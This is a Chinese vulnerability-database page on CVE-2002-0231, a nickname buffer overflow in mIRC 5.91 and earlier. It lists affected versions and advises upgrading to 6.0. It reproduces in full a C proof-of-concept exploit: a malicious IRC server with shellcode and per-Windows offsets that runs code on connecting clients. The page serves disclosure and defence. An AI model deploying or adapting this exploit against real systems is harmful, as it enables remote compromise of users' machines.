CVE-2002-0231
CVSS7.5
发布时间 :2002-05-16 00:00:00
修订时间 :2016-10-17 22:17:18
NMCOES    

[原文]Buffer overflow in mIRC 5.91 and earlier allows a remote server to execute arbitrary code on the client via a long nickname.


[CNNVD]MIRC Nick缓冲区溢出漏洞(CNNVD-200205-042)

        mIRC 5.91及其早期版本存在缓冲区溢出漏洞。远程服务器借助超长呢称在客户端执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:khaled_mardam-bey:mirc:5.9
cpe:/a:khaled_mardam-bey:mirc:2.3a
cpe:/a:khaled_mardam-bey:mirc:2.5a
cpe:/a:khaled_mardam-bey:mirc:2.7a
cpe:/a:khaled_mardam-bey:mirc:5.91
cpe:/a:khaled_mardam-bey:mirc:2.1a
cpe:/a:khaled_mardam-bey:mirc:3.8
cpe:/a:khaled_mardam-bey:mirc:4.7
cpe:/a:khaled_mardam-bey:mirc:5.6
cpe:/a:khaled_mardam-bey:mirc:3.7
cpe:/a:khaled_mardam-bey:mirc:4.6
cpe:/a:khaled_mardam-bey:mirc:5.5
cpe:/a:khaled_mardam-bey:mirc:3.4
cpe:/a:khaled_mardam-bey:mirc:2.4
cpe:/a:khaled_mardam-bey:mirc:3.3
cpe:/a:khaled_mardam-bey:mirc:5.1
cpe:/a:khaled_mardam-bey:mirc:5.8
cpe:/a:khaled_mardam-bey:mirc:3.9
cpe:/a:khaled_mardam-bey:mirc:5.7
cpe:/a:khaled_mardam-bey:mirc:3.6
cpe:/a:khaled_mardam-bey:mirc:4.5
cpe:/a:khaled_mardam-bey:mirc:5.4
cpe:/a:khaled_mardam-bey:mirc:2.4a
cpe:/a:khaled_mardam-bey:mirc:3.5
cpe:/a:khaled_mardam-bey:mirc:5.3
cpe:/a:khaled_mardam-bey:mirc:3.2
cpe:/a:khaled_mardam-bey:mirc:4.1
cpe:/a:khaled_mardam-bey:mirc:5.0
cpe:/a:khaled_mardam-bey:mirc:3.1
cpe:/a:khaled_mardam-bey:mirc:4.0
cpe:/a:khaled_mardam-bey:mirc:2.8c

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0231
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0231
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-042
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101286747013955&w=2
(UNKNOWN)  BUGTRAQ  20020203 Buffer overflow in mIRC allowing arbitary code to be executed.
http://online.securityfocus.com/archive/1/254105
(UNKNOWN)  BUGTRAQ  20020204 Re: Buffer overflow in mIRC allowing arbitary code to be executed.
http://www.iss.net/security_center/static/8083.php
(VENDOR_ADVISORY)  XF  mirc-nickname-bo(8083)
http://www.securityfocus.com/bid/4027
(UNKNOWN)  BID  4027
http://www.uuuppz.com/research/adv-001-mirc.htm
(UNKNOWN)  MISC  http://www.uuuppz.com/research/adv-001-mirc.htm

- 漏洞信息

MIRC Nick缓冲区溢出漏洞
高危 缓冲区溢出
2002-05-16 00:00:00 2005-10-20 00:00:00
远程  
        mIRC 5.91及其早期版本存在缓冲区溢出漏洞。远程服务器借助超长呢称在客户端执行任意代码。

- 公告与补丁

        This issue has been addressed in mIRC 6.0. Users are advised to upgrade.
        Khaled Mardam-Bey mIRC 2.1 a
        
        Khaled Mardam-Bey mIRC 2.3 a
        
        Khaled Mardam-Bey mIRC 2.4 a
        
        Khaled Mardam-Bey mIRC 2.4
        
        Khaled Mardam-Bey mIRC 2.5 a
        
        Khaled Mardam-Bey mIRC 2.7 a
        
        Khaled Mardam-Bey mIRC 2.8 c
        
        Khaled Mardam-Bey mIRC 3.1
        
        Khaled Mardam-Bey mIRC 3.2
        
        Khaled Mardam-Bey mIRC 3.3
        
        Khaled Mardam-Bey mIRC 3.4
        
        Khaled Mardam-Bey mIRC 3.5
        
        Khaled Mardam-Bey mIRC 3.6
        
        Khaled Mardam-Bey mIRC 3.7
        
        Khaled Mardam-Bey mIRC 3.8
        
        Khaled Mardam-Bey mIRC 3.9
        
        Khaled Mardam-Bey mIRC 4.0
        
        Khaled Mardam-Bey mIRC 4.1
        
        Khaled Mardam-Bey mIRC 4.5
        
        Khaled Mardam-Bey mIRC 4.6
        
        Khaled Mardam-Bey mIRC 4.7
        
        Khaled Mardam-Bey mIRC 5.0
        
        Khaled Mardam-Bey mIRC 5.1
        
        Khaled Mardam-Bey mIRC 5.3
        
        Khaled Mardam-Bey mIRC 5.4
        
        Khaled Mardam-Bey mIRC 5.5
        
        Khaled Mardam-Bey mIRC 5.6
        
        Khaled Mardam-Bey mIRC 5.7
        
        Khaled Mardam-Bey mIRC 5.8
        
        Khaled Mardam-Bey mIRC 5.9
        
        Khaled Mardam-Bey mIRC 5.91
        

- 漏洞信息 (21274)

MIRC 2.x/3.x/4.x/5.x Nick Buffer Overflow Vulnerability (EDBID:21274)
windows remote
2002-02-03 Verified
0 James Martin
N/A [点击下载]
source: http://www.securityfocus.com/bid/4027/info

mIRC is a popular Internet Relay Chat client whichs runs of Microsoft Windows 9x/ME/NT/2000/XP operating systems.

A remote exploitable buffer overflow condition has been discovered in mIRC. This issue is due to improper bounds checking of nicknames sent by the server. A excessively long nickname (200+) is capable of overwriting stack variables. This may be exploited by a malicious server. This issue is also exploitable via a webpage that can instruct the client to launch and to make a connection to the malicious server.

This may lead to a full compromise of the host running the client software on some Windows systems. 

/* Mirc buffer nickname buffer overflow proof of concept exploit.
   Author: James Martin
   Email: me@uuuppz.com
   Website: http://www.uuuppz.com


   This code is purely to demonstrate the risk posed by this flaw.
   It should not be used for malicious purposes. I do not accept
   any responsibility for any dammage it may cause due to it use.

   This code compiles in Borland C++ 5.5 command line tools. Run it,
   and type /server 127.0.0.1 2680 (in mirc that is :P).

   This exploit could be modified to work on many editions of mirc
   running on all variants of windows. However due to the messing
   around that is required to place the return address on the stack
   It will work on:
   For the following do not #define EXPLOIT_2K
   Windows 98SE running Mirc 5.91
   Windows 98 running Mirc 5.91
   Windows ME running Mirc 5.91
   With exploit 2K defined it will exploit
   Windows 2K

   The basic concept of this overflow is as follows
   In memory mirc stores the following variables
   [Primarynick(100chars)][Alternativenick(100chars)][WhichNick[dword]]
   There is no length checking on  the nickname returned to nick by the server.
   There are two ways to exploit this
   a) Send the msg ":OLDCLIENTNICK NICK NEWCLIENTNICK"
   b) Send ":testserver 001 NEWNICKNAME :blah blah"

   I found method a) on the 24/10/2001 and reported this problem to the author.
   Method b) was published by eSDee of hoepelkoe 23/10/2001 (completely unknown to me!)
   very coincidental really.

   From debugging the code, it seems that this buffer is copied in several places.
   So there maybe more places to exploit this than are currently known.

   I spent quite a bit of time analysing the hole, in the end I found
   the way to do it was, to overright WhichNick with a value, that would
   cause the currentnickname to reference the stack, then send another nick
   name containing the new version of  EIP to be overwritten on the stack.

   For this we need a magick number to be placed in currentnickname, this number
   must satisfy the equation (magicknumber*100)+offset = location of pushed eip. Also
   this magick number must not contain any zero bytes or spaces (value of 32). This
   works by exploiting the integer overflow concept.

   The following is the code which appears in mirc.
   imul    ecx, WhichNick, 64h
   add     ecx, offset PrimaryNick

   Unfortuantly the location of the stack varies between different versions of windows.
   NT, Win2k, XP all have the stack in very similar positions but it does move slightly.
   Win98,Win98SE, WinME all have the stack in EXACTLY the same position. Windows 95 is
   different again. Hence having to do a #define for the os you wish to exploit.

   This may seem like quite a large mitigating factor but in reality this is very easy
   to overcome if you couple this exploit with a HTTP server which sends out a page to
   cause mirc to load and attempt to connect to our evil server. As Internet explorer,
   is nice enough to tell us exactly what OS is running! I think we can blame MS for that
   one, talk about giving us a helping hand!
*/

#include<stdio.h>
#include<windows.h>
#include<winsock2.h>
#define SOCKADDRCAST struct sockaddr_in *

// This fuction binds a listenig socket
SOCKET openlistensocket(void) {
   SOCKET s;
   struct sockaddr_in SockAdr;

   // Get a new socket
   s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
   // Set the ip add ress we are going to bind to
   memset(&SockAdr, 0, sizeof(SockAdr));
   SockAdr.sin_addr.s_addr = inet_addr("0.0.0.0")  ;
   SockAdr.sin_family=AF_INET;
   SockAdr.sin_port=htons(2680);

   printf("2: Starting\n");
   // Attempt to bind socket
   if(bind(s, (SOCKADDRCAST)&SockAdr, sizeof(SockAdr))) {
      // Failed free socket and return -1
      printf("Failed to open, %u\n",WSAGetLastError());

      closesocket(s);
      return(-1);
   } else // Success listen on socket
      if(listen(s, 10)!=SOCKET_ERROR)
        return(s);
      else {
        printf("Failed to open listen socket (listen, %u)\n",WSAGetLastError());

        closesocket(s);
        return(-1);
      }
}

// Shell code, this just launches an executable
// specifid following the shell code. Currently
// it does not clean up properly, so mirc will
// crash.
char shellcode[44] = {
0x6A,0x01,0xB8,0xBF,
0x74,0x55,0x44,0xC1,
0xE0,0x08,0xC1,0xE8,
0x08,0x50,0xB8,0x50,
0x90,0x54,0x44,0xC1,
0xE0,0x08,0xC1,0xE8,
0x08,0xFF,0xd0,0x33,
0xDB,0x53,0xB8,0x10,
0x8e,0x54,0x44,0xc1,
0xe0,0x08,0xc1,0xe8,
0x08,0xff,0xd0,0x00};


#define EXPLOI_9x

#define MAGICNUMBER_NT 0x28eb207
#define MAGICNUMBER_2K 0x28eb205
#define MAGICNUMBER_XP 0x28eb205
#define MAGICNUMBER_9x 0x28Fc909
#define OFFSET_NT 20
#define OFFSET_2K 84
#define OFFSET_XP 12
#define OFFSET_9x 180
#define OFFSET_95 184


#ifdef EXPLOIT_NT
 #define MAGICNUMBER MAGICNUMBER_NT
 #define OFFSET OFFSET_NT
#else
 #ifdef EXPLOIT_2K
  #define MAGICNUMBER MAGICNUMBER_2K
  #define OFFSET OFFSET_2K
 #else
  #ifdef EXPLOIT_XP
   #define MAGICNUMBER MAGICNUMBER_XP
   #define OFFSET OFFSET_XP
  #else
   #define MAGICNUMBER MAGICNUMBER_9x
   #ifdef EXPLOIT_95
     #define OFFSET OFFSET_95
   #else
     #define OFFSET OFFSET_9x
   #endif
  #endif
 #endif
#endif

// Our main function
void main() {
  SOCKET s,client;
  char buf1[300],
       buf2[190],
       buf3[1500];
  /* Perform winsock startup */
  WORD wVersionRequested;
  WSADATA wsaData;
  HANDLE h;
  int wsErr;
  int len, *i;
   struct sockaddr_in SockAdr;

  wVersionRequested = MAKEWORD( 1, 1 );
  wsErr = WSAStartup( wVersionRequested, &wsaData );
  printf("1: Initialising %u\n",wsErr);
  if ( wsErr != 0 ) {
    /* Tell the user that we couldn't find a usable */
    /* WinSock DLL.                                  */
    printf("Failed to start winsock exiting\n");
    return;
  }

  // Open Listen Socket
  s = openlistensocket();

  // Accept a connection
  len = sizeof(SockAdr);
  client = accept(s, &SockAdr, &len);
  printf("Accepted\n");

  // Init the two exploit buffers.
  memset(buf1, 'X', sizeof(buf1));
  memset(buf2, 'Y', sizeof(buf1));
  buf1[204] = 0;
  buf2[OFFSET+3] = 0;

  // Set the return address to be poped onto the stack
  buf2[OFFSET] = 0x94;
  buf2[OFFSET+1] = 0x74;
  buf2[OFFSET+2] = 0x55;

  // Set our little magic number
  i = (int *)(buf1+200);
  *i = MAGICNUMBER;

  // Build the exploit string
  sprintf(buf3, ":testserver 001 %s%scalc.exe :ddd\n:testserver 001 %s :x\n:testserver 001 test :x\n",  buf1,shellcode,buf2);

  // Send it
  send(client, buf3, strlen(buf3),0);

  // Wait
  printf("Waiting\n");
  Sleep(10000);

  // Cleanup
  closesocket(client);
  closesocket(s);
}

		

- 漏洞信息

6404
mIRC Long Nickname Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

A remote overflow exists in mIRC. It fails to validate nickname strings resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2001-10-24 2001-10-24
2001-12-15 Unknow

- 解决方案

Upgrade to version 6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

MIRC Nick Buffer Overflow Vulnerability
Boundary Condition Error 4027
Yes No
2002-02-03 12:00:00 2009-07-11 09:56:00
This vulnerability was submitted to BugTraq on February 3rd, 2002 by "James Martin" <me@uuuppz.com>.

- 受影响的程序版本

Khaled Mardam-Bey mIRC 5.91
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
Khaled Mardam-Bey mIRC 5.9
Khaled Mardam-Bey mIRC 5.8
Khaled Mardam-Bey mIRC 5.7
Khaled Mardam-Bey mIRC 5.6
Khaled Mardam-Bey mIRC 5.5
Khaled Mardam-Bey mIRC 5.4
Khaled Mardam-Bey mIRC 5.3
Khaled Mardam-Bey mIRC 5.1
Khaled Mardam-Bey mIRC 5.0
Khaled Mardam-Bey mIRC 4.7
Khaled Mardam-Bey mIRC 4.6
Khaled Mardam-Bey mIRC 4.5
Khaled Mardam-Bey mIRC 4.1
Khaled Mardam-Bey mIRC 4.0
Khaled Mardam-Bey mIRC 3.9
Khaled Mardam-Bey mIRC 3.8
Khaled Mardam-Bey mIRC 3.7
Khaled Mardam-Bey mIRC 3.6
Khaled Mardam-Bey mIRC 3.5
Khaled Mardam-Bey mIRC 3.4
Khaled Mardam-Bey mIRC 3.3
Khaled Mardam-Bey mIRC 3.2
Khaled Mardam-Bey mIRC 3.1
Khaled Mardam-Bey mIRC 2.8 c
Khaled Mardam-Bey mIRC 2.7 a
Khaled Mardam-Bey mIRC 2.5 a
Khaled Mardam-Bey mIRC 2.4 a
Khaled Mardam-Bey mIRC 2.4
Khaled Mardam-Bey mIRC 2.3 a
Khaled Mardam-Bey mIRC 2.1 a
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Khaled Mardam-Bey mIRC 6.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- 不受影响的程序版本

Khaled Mardam-Bey mIRC 6.0
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home

- 漏洞讨论

mIRC is a popular Internet Relay Chat client whichs runs of Microsoft Windows 9x/ME/NT/2000/XP operating systems.

A remote exploitable buffer overflow condition has been discovered in mIRC. This issue is due to improper bounds checking of nicknames sent by the server. A excessively long nickname (200+) is capable of overwriting stack variables. This may be exploited by a malicious server. This issue is also exploitable via a webpage that can instruct the client to launch and to make a connection to the malicious server.

This may lead to a full compromise of the host running the client software on some Windows systems.

- 漏洞利用

This exploit was submitted by "James Martin" &lt;me@uuuppz.com&gt;.

- 解决方案

This issue has been addressed in mIRC 6.0. Users are advised to upgrade.


Khaled Mardam-Bey mIRC 2.1 a

Khaled Mardam-Bey mIRC 2.3 a

Khaled Mardam-Bey mIRC 2.4 a

Khaled Mardam-Bey mIRC 2.4

Khaled Mardam-Bey mIRC 2.5 a

Khaled Mardam-Bey mIRC 2.7 a

Khaled Mardam-Bey mIRC 2.8 c

Khaled Mardam-Bey mIRC 3.1

Khaled Mardam-Bey mIRC 3.2

Khaled Mardam-Bey mIRC 3.3

Khaled Mardam-Bey mIRC 3.4

Khaled Mardam-Bey mIRC 3.5

Khaled Mardam-Bey mIRC 3.6

Khaled Mardam-Bey mIRC 3.7

Khaled Mardam-Bey mIRC 3.8

Khaled Mardam-Bey mIRC 3.9

Khaled Mardam-Bey mIRC 4.0

Khaled Mardam-Bey mIRC 4.1

Khaled Mardam-Bey mIRC 4.5

Khaled Mardam-Bey mIRC 4.6

Khaled Mardam-Bey mIRC 4.7

Khaled Mardam-Bey mIRC 5.0

Khaled Mardam-Bey mIRC 5.1

Khaled Mardam-Bey mIRC 5.3

Khaled Mardam-Bey mIRC 5.4

Khaled Mardam-Bey mIRC 5.5

Khaled Mardam-Bey mIRC 5.6

Khaled Mardam-Bey mIRC 5.7

Khaled Mardam-Bey mIRC 5.8

Khaled Mardam-Bey mIRC 5.9

Khaled Mardam-Bey mIRC 5.91

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站